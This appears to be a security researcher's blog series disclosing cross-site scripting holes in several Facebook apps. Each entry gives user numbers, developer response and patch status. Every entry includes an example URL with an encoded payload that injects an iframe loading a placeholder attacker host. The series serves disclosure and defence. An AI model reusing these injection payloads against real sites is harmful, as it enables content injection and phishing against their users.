FAXX Hack: Death’s Time

Current Monthly Active Users: 11,802,383

Current Rank on Application Leaderboard: 16

Application Developer: 3happybytes

Responsiveness: I received no communication at first from the developers, but Facebook did. The hole was patched about a week after notification. After patching, the developer get in touch to confirm the fix.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/death-time/result.php?dia=1&anio=1991&mes=1%22%2F%3E%3C%2Fa%3E%3C%2Fp%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Willy’s Sweet Shop

Facebook Verified Application

Current Monthly Active Users: 853,598

Current Rank on Application Leaderboard: 136

Application Developer: Mob Science

Responsiveness: Facebook has been in touch with the developers, and today (about a week after notification) they issued a patch.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/ochristmastree/?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Trazzler

Facebook Verified Application

Current Monthly Active Users: 5,448

Current Rank on Application Leaderboard: 2,833

Application Developer: Trazzler

Responsiveness: The developers at Trazzler have been responsive, and I’ve been working with them to try and get the hole patched. I was honestly a little disappointed by the information they got from Facebook about the hole, but that’s for another post.

Vulnerability Status: Unpatched Patched Sep. 24

Example URI: http://apps.new.facebook.com/trazzler/ajax/browse_navigation/?browse-search=%3Cfb%3Aiframe+src%3D’http%3A%2F%2FEVILURI%2F’%3E

Notes: See the leaderboard rank of Trazzler? I chose to check it after looking at the list of Facebook Verified Applications, which means AppData lists around 2,800 applications I haven’t checked which have higher MAU than Trazzler. This Month of Facebook Bugs only begins to scratch the surface of Facebook applications.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: My Zoo

Current Monthly Active Users: 953,784

Current Rank on Application Leaderboard: 124

Application Developer: Eyrewood Studios

Responsiveness: I did not direct contact information for the developer, so I forwarded this request to Facebook, and the hole has since been patched.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/myownzoo/friends.php?uid=1527549541%5C%27%2F%3E%3Cfb%3Aiframe%20src%3D%22http%3A%2F%2Feviluri%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Hugged

Facebook Verified Application

Current Monthly Active Users: 3,169,974

Current Rank on Application Leaderboard: 51

Application Developer: Manakki

Responsiveness: I did not receive any responses from Manakki, but they did patch the hole – the example URI below now brings up a page that says, “Please go away.”

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/huggees/experi?hid=318&idz=1077687358%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: SocialCalendar

Facebook Verified Application

Current Monthly Active Users: 1,661,572

Current Rank on Application Leaderboard: 93

Application Developer: SocialCalendar.com

Responsiveness: I received an e-mail back from SocialCalendar the day after contacting them, and they noted that they take information security seriously.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/socialcal/?x=0&ref=&sc_op=showView&sc_v=movieList&sc_movie_category=upcoming&sc_page=1%3Cfb:iframe+src%3D%22http://eviluri/%22%3E&sc_max_page_viewed=1

Example POST Request: http://apps.facebook.com/socialcal/?sc_movie_search_type=NAME&sc_movie_search_query=”/><fb:iframe src=”http://eviluri/”>&sc_op=showView&sc_v=movieSearch

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Circle of Friends

Posting these is not an automated process, and I was on the road most of yesterday, so again I apologize for being a day late. This counts as Friday’s FAXX Hack.

Current Monthly Active Users: 635,797

Current Rank on Application Leaderboard: 172

Application Developer: Bantr

Responsiveness: I received an e-mail about a day after reporting the hole to let me know that Bantr had fixed it.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/friendcircles/circle_settings.php?circle_id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Brain Buddies

Facebook Verified Application

Current Monthly Active Users: 4,861,078

Current Rank on Application Leaderboard: 38

Application Developer: wooga – world of gaming

Responsiveness: Wooga did not send any messages, but did patch the hole.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/brainbuddies/?ref=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 3 4 5 6 7 12